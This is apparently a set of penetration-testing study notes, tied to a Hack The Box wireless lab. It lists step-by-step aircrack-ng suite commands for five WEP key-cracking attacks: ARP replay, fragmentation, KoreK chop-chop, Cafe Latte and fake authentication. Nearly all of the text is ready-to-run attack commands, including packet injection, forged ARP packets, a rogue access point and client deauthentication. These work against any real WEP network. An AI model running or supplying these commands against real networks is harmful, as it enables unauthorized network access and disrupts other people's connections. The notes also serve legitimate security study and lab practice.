You can disable monitor mode anytime with sudo airmon-ng stop wlan0mon
ARP Request Replay Attack (with ARP request, client needed)
- Monitor mode:
sudo airmon-ng start wlan0 - Confirm it is in and get the interface name:
iwconfig - Start with this to find the network interested in:
sudo airodump-ng wlan0mon --band abg - Once you find it be specific on channel, also write it to file (optional to use
--bssid):
sudo airodump-ng wlan0mon -c 1 -w WEPfile - Open ANOTHER TERMINAL and launch ARP request replay attack (b is the BSSID of the AP and h is the station/client MAC):
sudo aireplay-ng -3 -b B2:D1:AC:E1:21:D1 -h 4A:DD:C6:71:5A:3B wlan0mon - Let it run for a while, then use aircrack-ng to crack it:
aircrack-ng -b B2:D1:AC:E1:21:D1 WEPfile-01.cap
Fragmentation Attack (no ARP request, client needed)
- Monitor mode:
sudo airmon-ng start wlan0 - Confirm it is in and get the interface name:
iwconfig - Start with this to find the network interested in:
sudo airodump-ng wlan0mon --band abg - Once you find it be specific on channel, also write it to file (optional to use
--bssid):
sudo airodump-ng wlan0mon -c 1 -w WEPfile - Open ANOTHER TERMINAL and launch fragmentation attack (b is the BSSID of the AP and h is the station/client MAC):
sudo aireplay-ng -5 -b B2:D1:AC:E1:21:D1 -h 4A:DD:C6:71:5A:3B wlan0mon - You should receive something like cap file and xor wrote (press y when asked). Next use below on the cap file to obtain source and destination IP:
tcpdump -s 0 -n -e -r replay_src-0805-191842.cap - Access point mac in
-a, station MAC in-h, access point IP in-k, station IP in-l, xor file-y, output ARP file-w. If no IP from the above can put 255.255.255.255 for both-kand-l:
packetforge-ng -0 -a A2:BD:32:EB:21:15 -h 42:E9:11:39:88:AE -k 192.168.1.1 -l 192.168.1.129 -y fragment-0805-191851.xor -w forgedarp.cap - Inject this back to generate IV using interactive packet replay (
-his station MAC and-ris the output from above):
sudo aireplay-ng -2 -r forgedarp.cap -h 42:E9:11:39:88:AE wlan0mon - Can open another new terminal if you want it to be faster (3 terminal now):
sudo aireplay-ng -3 -b A2:BD:32:EB:21:15 -h 42:E9:11:39:88:AE wlan0mon - Crack it after a while:
aircrack-ng -b A2:BD:32:EB:21:15 WEPfile-01.cap
Korek Chop Chop Attack (Client needed)
- Monitor mode:
sudo airmon-ng start wlan0 - Confirm it is in and get the interface name:
iwconfig - Start with this to find the network interested in:
sudo airodump-ng wlan0mon --band abg - Once you find it be specific on channel, also write it to file (optional to use
--bssid):
sudo airodump-ng wlan0mon -c 1 -w WEPfile - Open ANOTHER TERMINAL and launch Korek Chop Chop attack (b is the BSSID of the AP and h is the station/client MAC):
sudo aireplay-ng -4 -b C8:D1:4D:EA:21:A6 -h 7E:8D:FC:DD:D7:2C wlan0mon - You should receive something like cap file and xor wrote (press y when asked). Next use below on the cap file to obtain source and destination IP:
tcpdump -s 0 -n -e -r replay_dec-0805-191842.cap - Access point mac in
-a, station MAC in-h, access point IP in-k, station IP in-l, xor file-y, output ARP file-w. (Not sure: If no IP from the above can put 255.255.255.255 for both-kand-l):
packetforge-ng -0 -a A2:BD:32:EB:21:15 -h 42:E9:11:39:88:AE -k 192.168.1.1 -l 192.168.1.129 -y replay_dec-1229-160018.xor -w forgedarp.cap - Inject this back to generate IV using interactive packet replay (
-his station MAC and-ris the output from above):
sudo aireplay-ng -2 -r forgedarp.cap -h 7E:8D:FC:DD:D7:2C wlan0mon - Can open another new terminal if you want it to be faster (3 terminal now):
sudo aireplay-ng -3 -b C8:D1:4D:EA:21:A6 -h 7E:8D:FC:DD:D7:2C wlan0mon - Crack it after a while:
aircrack-ng -b C8:D1:4D:EA:21:A6 WEPfile-01.cap
Cafe Latte Attack
- Monitor mode:
sudo airmon-ng start wlan0 - Confirm it is in and get the interface name:
iwconfig - Start with this to find the network interested in:
sudo airodump-ng wlan0mon --band abg - Once you find it be specific on channel, also write it to file (optional to use
--bssid):
sudo airodump-ng wlan0mon -c 1 -w WEPfile - Open ANOTHER TERMINAL and launch Cafe Latte attack (b is the BSSID of the AP and h is the station/client MAC):
sudo aireplay-ng -6 -b B2:D1:AC:E1:21:D1 -h 7E:8D:FC:DD:D7:2C wlan0mon - Open ANOTHER TERMINAL and create a fake access point (a is BSSID, e is ESSID, c is channel, W 1 is WEP, L is Cafe Latte):
sudo airbase-ng -c 1 -a B2:D1:AC:E1:21:D1 -e "HackTheWifi" wlan0mon -W 1 -L - Deauthenticate the client from actual AP and force them to join us:
sudo aireplay-ng -0 10 -a B2:D1:AC:E1:21:D1 -c B6:1F:98:CB:10:78 wlan0mon - Crack it after a while:
aircrack-ng -b B2:D1:AC:E1:21:D1 WEPfile-01.cap
Fake Authentication (Client Not Needed)
- Monitor mode:
sudo airmon-ng start wlan0 - Confirm it is in and get the interface name:
iwconfig - Start with this to find the network interested in:
sudo airodump-ng wlan0mon --band abg - Once you find it be specific on channel, also write it to file (optional to use
--bssid):
sudo airodump-ng wlan0mon -c 1 -w WEPfile - Open ANOTHER TERMINAL and try fake authentication with (ESSID in e, AP MAC in a, our own MAC in h, keep alive interval in q):
sudo aireplay-ng -1 1000 -o 1 -q 5 -e HTB-Wireless -a 60:38:E0:71:E9:DC -h 00:c0:ca:98:3e:e0 wlan0mon - Open ANOTHER TERMINAL and use Korek or fragmentation. Example here is Korek (b is BSSID, h is our own MAC):
sudo aireplay-ng -4 -b 60:38:E0:71:E9:DC -h 00:c0:ca:98:3e:e0 wlan0mon - Access point mac in
-a, our MAC in-h, access point IP in-k, our IP in-l, xor file-y, output ARP file-w. (Not sure: If not sure IP just use 255.255.255.255):
packetforge-ng -0 -a 60:38:e0:71:e9:dc -h 00:c0:ca:98:3e:e0 -k 192.168.1.1 -l 192.168.1.64 -y replay_dec-1229-160018.xor -w forgedarp.cap - Inject this back (
-ris the output from above):
sudo aireplay-ng -2 -r forgedarp.cap wlan0mon